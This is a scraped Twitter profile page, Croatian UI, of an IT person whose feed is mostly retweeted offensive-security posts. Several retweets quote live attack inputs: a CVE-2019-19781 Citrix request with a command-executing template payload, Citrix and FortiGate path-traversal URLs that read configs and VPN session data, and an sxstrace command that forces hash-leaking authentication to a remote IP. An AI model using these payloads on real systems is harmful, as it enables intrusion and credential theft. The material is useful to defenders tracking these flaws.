whoaim

@i_r_eip

Hello! I'm an IT guy, a player and more.

Vrijeme pridruživanja: ožujak 2014.

Tweetovi

Blokirali ste korisnika/cu @i_r_eip

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @i_r_eip

  1. proslijedio/la je Tweet
    31. sij

    How to hack yourself admin rights on any Autopilot installed Windows 10 - aka The Return of the Shift+F10!

    Poništi
  2. proslijedio/la je Tweet
    31. sij
    Odgovor korisnicima

    Oh yes, only god and users of will know what I have done soon 🤓

    Poništi
  3. proslijedio/la je Tweet
    30. sij
    Poništi
  4. proslijedio/la je Tweet
    24. sij

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

    Poništi
  5. proslijedio/la je Tweet
    24. sij

    Grouper2 : Find vulnerabilities in AD Group Policy : cc

    Poništi
  6. Poništi
  7. proslijedio/la je Tweet
    14. sij

    I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell PoC exploit code:

    Poništi
  8. proslijedio/la je Tweet
    13. sij

    The captcha and the 'Contact Us' button are perfect 😂😭

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    14. sij

    Support added to crack Citrix NetScaler (SHA512) hashes with hashcat 6.0.0:

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    14. sij
    Poništi
  11. proslijedio/la je Tweet
    13. sij

    Update CVE-2019-19781 You can exploit the vulnerability without the file and only use the file ! You can inject your payload inside the name of the XML file and fire the command execution ! 🔥💪

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    13. sij

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

    Poništi
  13. proslijedio/la je Tweet
    10. sij

    Just published a new blogpost with more details about the Citrix ADC Remote Command Execution.

    Poništi
  14. proslijedio/la je Tweet
    9. sij
    Poništi
  15. proslijedio/la je Tweet
    8. sij

    CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcast

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    13. pro 2018.

    This little technique can force your blind to output anything you want!

    Poništi
  17. proslijedio/la je Tweet
    5. pro 2018.

    So I finally decided to write about a cool (old) story with JBoss /cc

    Poništi
  18. proslijedio/la je Tweet
    17. pro 2019.

    Who else is still scanning BB programs for this? They are still out there! Free💰💰 Happy holidays! /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

    Poništi
  19. proslijedio/la je Tweet
    9. pro 2019.

    Criminals don’t give a fuck if you’re ISO 27001 compliant

    Poništi
  20. proslijedio/la je Tweet
    4. pro 2019.

    When doing content discovery with Intruder, don't only rely on responses size or status code. A quick Grep Extract on "<title>(.*?)</title>" may go a long way...

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·